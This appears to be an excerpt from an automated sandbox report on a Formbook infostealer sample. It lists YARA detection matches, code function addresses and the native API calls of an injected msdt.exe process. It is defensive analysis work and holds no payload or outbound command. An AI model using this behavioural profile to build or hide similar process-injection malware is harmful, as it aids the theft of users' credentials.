          Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE indicator application name: unknown
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0037F1084_2_0037F108
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_003706CC4_2_003706CC
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004414F04_2_004414F0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00441D514_2_00441D51
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445E404_2_00445E40
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004427524_2_00442752
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004454504_2_00445450
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445C784_2_00445C78
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004458084_2_00445808
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004498204_2_00449820
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004468C84_2_004468C8
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004404E74_2_004404E7
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445C884_2_00445C88
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004414BD4_2_004414BD
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0044B5884_2_0044B588
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004445A04_2_004445A0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004445B04_2_004445B0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445A604_2_00445A60
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004436684_2_00443668
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0044CE004_2_0044CE00
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004457FA4_2_004457FA
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00AD79AE4_2_00AD79AE
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004010265_2_00401026
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041D0345_2_0041D034
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041C0C75_2_0041C0C7
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041C9695_2_0041C969
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004011745_2_00401174
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041B93E5_2_0041B93E
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00408C905_2_00408C90
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BBE0C65_2_00BBE0C6
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BED0055_2_00BED005
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BD905A5_2_00BD905A
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC30405_2_00BC3040
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BBE2E95_2_00BBE2E9
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C612385_2_00C61238
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BE63DB5_2_00BE63DB
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BBF3CF5_2_00BBF3CF
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C663BF5_2_00C663BF
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC23055_2_00BC2305
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C0A37B5_2_00C0A37B
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC73535_2_00BC7353
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BD14895_2_00BD1489
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BF54855_2_00BF5485
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BFD47D5_2_00BFD47D
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BDC5F05_2_00BDC5F0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C065405_2_00C06540
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC351F5_2_00BC351F
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC46805_2_00BC4680
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BCE6C15_2_00BCE6C1
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C626225_2_00C62622
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C0A6345_2_00C0A634
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BCC7BC5_2_00BCC7BC
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C4579A5_2_00C4579A
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BF57C35_2_00BF57C3
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C5F8EE5_2_00C5F8EE
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00AD79AE5_2_00AD79AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026A12387_2_026A1238
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025FE2E97_2_025FE2E9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0264A37B7_2_0264A37B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026073537_2_02607353
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026023057_2_02602305
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025FF3CF7_2_025FF3CF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026263DB7_2_026263DB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026A63BF7_2_026A63BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026030407_2_02603040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261905A7_2_0261905A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0262D0057_2_0262D005
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025FE0C67_2_025FE0C6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026A26227_2_026A2622
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0264A6347_2_0264A634
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260E6C17_2_0260E6C1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026046807_2_02604680
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026357C37_2_026357C3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260C7BC7_2_0260C7BC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0268579A7_2_0268579A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0263D47D7_2_0263D47D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0268443E7_2_0268443E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026354857_2_02635485
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026114897_2_02611489
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026465407_2_02646540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260351F7_2_0260351F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261C5F07_2_0261C5F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026B3A837_2_026B3A83
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02627B007_2_02627B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025FFBD77_2_025FFBD7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0268DBDA7_2_0268DBDA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026ACBA47_2_026ACBA4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0262286D7_2_0262286D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260C85C7_2_0260C85C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0269F8EE7_2_0269F8EE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0268394B7_2_0268394B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026859557_2_02685955
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026169FE7_2_026169FE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026029B27_2_026029B2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026A098E7_2_026A098E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261EE4C7_2_0261EE4C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02632E2F7_2_02632E2F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0262DF7C7_2_0262DF7C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02610F3F7_2_02610F3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02672FDC7_2_02672FDC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0269CFB17_2_0269CFB1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260CD5B7_2_0260CD5B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02630D3B7_2_02630D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0269FDDD7_2_0269FDDD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0009D0347_2_0009D034
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0009C0C57_2_0009C0C5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 02643F92 appears 132 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0264373B appears 244 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0266F970 appears 84 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 025FE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 025FDF5C appears 119 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: String function: 00C2F970 appears 46 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: String function: 00BBDF5C appears 65 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: String function: 00C0373B appears 109 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: String function: 00C03F92 appears 72 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004185F0 NtCreateFile,5_2_004185F0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004186A0 NtReadFile,5_2_004186A0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00418720 NtClose,5_2_00418720
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004187D0 NtAllocateVirtualMemory,5_2_004187D0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004185EA NtCreateFile,5_2_004185EA
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00418642 NtCreateFile,5_2_00418642
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041869A NtReadFile,5_2_0041869A
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041871A NtClose,5_2_0041871A
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004187CA NtAllocateVirtualMemory,5_2_004187CA
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB00C4 NtCreateFile,LdrInitializeThunk,5_2_00BB00C4
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB0078 NtResumeThread,LdrInitializeThunk,5_2_00BB0078
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB0048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00BB0048
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB07AC NtCreateMutant,LdrInitializeThunk,5_2_00BB07AC
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAF9F0 NtClose,LdrInitializeThunk,5_2_00BAF9F0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAF900 NtReadFile,LdrInitializeThunk,5_2_00BAF900
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_00BAFAE8
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_00BAFAD0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_00BAFBB8
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_00BAFB68
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_00BAFC90
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFC60 NtMapViewOfSection,LdrInitializeThunk,5_2_00BAFC60
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFD8C NtDelayExecution,LdrInitializeThunk,5_2_00BAFD8C
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_00BAFDC0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_00BAFEA0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_00BAFED0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFFB4 NtCreateSection,LdrInitializeThunk,5_2_00BAFFB4
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB10D0 NtOpenProcessToken,5_2_00BB10D0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB0060 NtQuerySection,5_2_00BB0060
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB01D4 NtSetValueKey,5_2_00BB01D4
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB010C NtOpenDirectoryObject,5_2_00BB010C
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB1148 NtOpenThread,5_2_00BB1148
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F00C4 NtCreateFile,LdrInitializeThunk,7_2_025F00C4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F07AC NtCreateMutant,LdrInitializeThunk,7_2_025F07AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_025EFAD0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_025EFAE8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFAB8 NtQueryValueKey,LdrInitializeThunk,7_2_025EFAB8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFB50 NtCreateKey,LdrInitializeThunk,7_2_025EFB50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_025EFB68
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_025EFBB8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EF900 NtReadFile,LdrInitializeThunk,7_2_025EF900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EF9F0 NtClose,LdrInitializeThunk,7_2_025EF9F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_025EFED0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFFB4 NtCreateSection,LdrInitializeThunk,7_2_025EFFB4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFC60 NtMapViewOfSection,LdrInitializeThunk,7_2_025EFC60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_025EFDC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFD8C NtDelayExecution,LdrInitializeThunk,7_2_025EFD8C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F0048 NtProtectVirtualMemory,7_2_025F0048
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F0078 NtResumeThread,7_2_025F0078
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F0060 NtQuerySection,7_2_025F0060
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F10D0 NtOpenProcessToken,7_2_025F10D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F1148 NtOpenThread,7_2_025F1148
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F010C NtOpenDirectoryObject,7_2_025F010C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F01D4 NtSetValueKey,7_2_025F01D4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFA50 NtEnumerateValueKey,7_2_025EFA50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFA20 NtQueryInformationFile,7_2_025EFA20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFBE8 NtQueryVirtualMemory,7_2_025EFBE8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EF8CC NtWaitForSingleObject,7_2_025EF8CC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EF938 NtWriteFile,7_2_025EF938
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F1930 NtSetContextThread,7_2_025F1930
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFE24 NtWriteVirtualMemory,7_2_025EFE24
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFEA0 NtReadVirtualMemory,7_2_025EFEA0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFF34 NtQueueApcThread,7_2_025EFF34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFFFC NtCreateProcessEx,7_2_025EFFFC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFC48 NtSetInformationFile,7_2_025EFC48
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F0C40 NtGetContextThread,7_2_025F0C40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFC30 NtOpenProcess,7_2_025EFC30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFC90 NtUnmapViewOfSection,7_2_025EFC90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFD5C NtEnumerateKey,7_2_025EFD5C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F1D80 NtSuspendThread,7_2_025F1D80
